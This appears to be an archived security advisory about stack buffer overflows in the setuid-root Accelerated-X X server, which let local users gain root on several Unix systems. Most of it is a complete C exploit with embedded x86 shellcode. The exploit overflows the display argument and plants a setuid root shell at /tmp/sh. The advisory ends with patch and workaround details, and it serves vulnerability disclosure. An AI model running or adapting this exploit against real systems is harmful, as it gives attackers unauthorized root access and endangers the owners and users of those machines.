COMMAND
Accelerated-X
SYSTEMS AFFECTED
Unices (Linux, FreeBSD, Solaris/x86, SCO)
PROBLEM
Following is based on KSR[T] Advisory #011. Local users can gain
administrative privileges by exploiting multiple buffer overflows
(stack overwrites) in the Accelerated-X X server.
Accelerated-X Server is a commercial X server available from
http://www.xig.com/. By default, the X server is installed setuid
root so that when it is executed by a user it still retains enough
privilege to load drivers, manipulate the display, and log
information. However, due to insufficient bounds checking on
command-line parameters, an attacker can overflow the X server by
specifying a 48 byte display string, or through a long string
passed into the -query command line parameter. Local users that
can execute the Accelerated-X Xserver can obtain root privileges.
(KSR[T] would like to thank Chris Evans for pointing out the
-query buffer overflow as well as additional security holes
relating to command line parameters)
Here is the exploit for the Accelerate-X buffer overflow. c0nd0r
checked the '-query' argument and found out that it will not
overwrite the return address thus not allowing the exploitation.
The argument '-indirect' behaves in the same way.
/*
* SDI linux exploit for Accelerate-X
* Sekure SDI - Brazilian Information Security Team
* by c0nd0r <condor@sekure.org>
*
* This script will exploit a vulnerability found by KSRT team
* in the Accelerate-X Xserver [<=5.0].
*
* --------------------------------------------------------------------
* The vulnerable buffer was small so we've changed the usual order to:
* [garbage][eip][lots nop][shellcode]
* BTW, I've also changed the code to execute, it will create a setuid
* shell owned by the superuser at /tmp/sh.
* --------------------------------------------------------------------
*
* Warning: DO NOT USE THIS TOOL FOR ILICIT ACTIVITIES! We take no
* responsability.
*
* Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
* marty (NORDO!), vader, fcon, slide, c_orb and
* specially to my sasazita. Also toxyn.org, pulhas.org,
* superbofh.org (Phibernet rox) and el8.org.
*
* Laughs - lame guys who hacked the senado/planalto.gov.br
* pay some attention to the site: securityfocus.com (good point).
* see you at #uground (irc.brasnet.org)
*/
#include <stdio.h>
/* generic shellcode */
char shellcode[] =
"\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
"\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
"\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
"\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff"
"/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";
main ( int argc, char *argv[] ) {
char buf[1024];
int x, y, offset=1000;
long addr;
int joe;
if (argc > 1)
offset = atoi ( argv[1]);
/* return address */
addr = (long) &joe + offset;
buf[0] = ':';
for ( x = 1; x < 53; x++)
buf[x] = 'X';
buf[x++] = (addr & 0x000000ff);
buf[x++] = (addr & 0x0000ff00) >> 8;
buf[x++] = (addr & 0x00ff0000) >> 16;
buf[x++] = (addr & 0xff000000) >> 24;
for ( ; x < 500; x++)
buf[x] = 0x90;
for ( y = 0; y < strlen(shellcode); y++, x++)
buf[x] = shellcode[y];
fprintf (stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%x\n\n",
offset, addr);
buf[strlen(buf)] = '\0';
execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);
// setenv ( "EGG", buf, 1);
// system ( "/bin/sh");
}
SOLUTION
For AccelX 5.x: XiG has made a patch available for 5.0.1 which
corrects these and other potential command line
interface security holes. Users running 5.0.0
have to apply the 5.0.1 patch prior to applying
the 5.0.2 patch. The patch is available at
ftp://ftp.xig.com/pub/updates.
For AccelX 4.x: Patch will be made available shortly. An interim
solution is to use an X server wrapper, or to
limit access to the Xaccel binary via a special
group.
The upcoming release of Maximum CDE 2.1 comes with the 5.0.2 X
Server, and is not vulnerable to these attacks.